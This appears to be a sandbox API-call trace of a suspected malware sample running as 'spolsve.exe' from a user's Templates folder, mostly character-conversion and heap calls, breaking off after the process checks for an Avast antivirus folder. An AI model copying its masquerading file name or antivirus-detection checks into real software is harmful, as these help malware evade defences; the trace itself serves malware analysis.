!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0116.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ9ÚÖoØþ\x19", lpUsedDefaultChar=0x0) returned 256 [0116.287] GetLastError () returned 0x0 [0116.287] SetLastError (dwErrCode=0x0) [0116.287] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0116.287] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ솑@Ā") returned 256 [0116.287] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ솑@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0116.287] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ솑@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0116.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ9ÚÖoØþ\x19", lpUsedDefaultChar=0x0) returned 256 [0116.287] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4128b8, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe")) returned 0x47 [0116.287] GetLastError () returned 0x0 [0116.287] SetLastError (dwErrCode=0x0) [0116.287] GetLastError () returned 0x0 [0116.287] SetLastError (dwErrCode=0x0) [0116.287] GetLastError () returned 0x0 [0116.287] SetLastError (dwErrCode=0x0) [0116.287] GetLastError () returned 0x0 [0116.287] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.288] SetLastError (dwErrCode=0x0) [0116.288] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.289] SetLastError (dwErrCode=0x0) [0116.289] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.290] GetLastError () returned 0x0 [0116.290] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.291] SetLastError (dwErrCode=0x0) [0116.291] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.292] GetLastError () returned 0x0 [0116.292] SetLastError (dwErrCode=0x0) [0116.293] GetLastError () returned 0x0 [0116.293] SetLastError (dwErrCode=0x0) [0116.293] GetLastError () returned 0x0 [0116.293] SetLastError (dwErrCode=0x0) [0116.293] GetLastError () returned 0x0 [0116.293] SetLastError (dwErrCode=0x0) [0116.293] GetLastError () returned 0x0 [0116.293] SetLastError (dwErrCode=0x0) [0116.293] GetLastError () returned 0x0 [0116.293] SetLastError (dwErrCode=0x0) [0116.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x50) returned 0x2161810 [0116.293] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.294] SetLastError (dwErrCode=0x0) [0116.294] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.295] GetLastError () returned 0x0 [0116.295] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.296] SetLastError (dwErrCode=0x0) [0116.296] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.297] GetLastError () returned 0x0 [0116.297] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.298] GetLastError () returned 0x0 [0116.298] SetLastError (dwErrCode=0x0) [0116.299] GetLastError () returned 0x0 [0116.299] SetLastError (dwErrCode=0x0) [0116.299] GetLastError () returned 0x0 [0116.299] SetLastError (dwErrCode=0x0) [0116.299] GetLastError () returned 0x0 [0116.299] SetLastError (dwErrCode=0x0) [0116.299] GetLastError () returned 0x0 [0116.299] SetLastError (dwErrCode=0x0) [0116.299] GetLastError () returned 0x0 [0116.299] SetLastError (dwErrCode=0x0) [0116.299] GetLastError () returned 0x0 [0116.299] SetLastError (dwErrCode=0x0) [0116.299] GetLastError () returned 0x0 [0116.299] SetLastError (dwErrCode=0x0) [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0xa0) returned 0x2161868 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x1f) returned 0x2161910 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x28) returned 0x2161938 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x37) returned 0x2161968 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x3c) returned 0x21619a8 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x31) returned 0x21619f0 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x14) returned 0x2161a30 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x24) returned 0x2161a50 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x31) returned 0x2161a80 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x28) returned 0x2161ac0 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0xd) returned 0x2161af0 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x17) returned 0x2161b08 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x2b) returned 0x2161b28 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x15) returned 0x2161b60 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x17) returned 0x2161b80 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x22) returned 0x2161ba0 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0xe) returned 0x2161bd0 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0xf0) returned 0x2161be8 [0116.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x3e) returned 0x2161ce0 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x1b) returned 0x2161d28 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x1d) returned 0x2161d50 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x48) returned 0x2161d78 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x12) returned 0x2161dc8 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x18) returned 0x2161de8 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x1b) returned 0x2161e08 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x24) returned 0x2161e30 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x29) returned 0x2161e60 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x1e) returned 0x2161e98 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x6b) returned 0x2161ec0 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x17) returned 0x2161f38 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x14) returned 0x2161f58 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0xf) returned 0x2161f78 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x16) returned 0x2161f90 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x28) returned 0x2161fb0 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x27) returned 0x2161fe8 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x12) returned 0x2162018 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x21) returned 0x2162038 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x10) returned 0x2162068 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x1c) returned 0x2162080 [0116.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x12) returned 0x21620a8 [0116.300] HeapFree (in: hHeap=0x2160000, dwFlags=0x0, lpMem=0x2160fd0 | out: hHeap=0x2160000) returned 1 [0116.301] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0116.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x800) returned 0x21620c8 [0116.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x8, Size=0x80) returned 0x2160fd0 [0116.301] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4051e6) returned 0x0 [0116.301] RtlSizeHeap (HeapHandle=0x2160000, Flags=0x0, MemoryPointer=0x2160fd0) returned 0x80 [0116.301] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x426390, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe")) returned 0x47 [0116.302] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161058 [0116.302] GetFileAttributesA (lpFileName="C:\\ProgramData\\AVAST Software" (normalized: "c:\\programdata\\avast software")) returned 0xffffffff [0116.302] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x21610a0 [0116.302] GetFileAttributesA 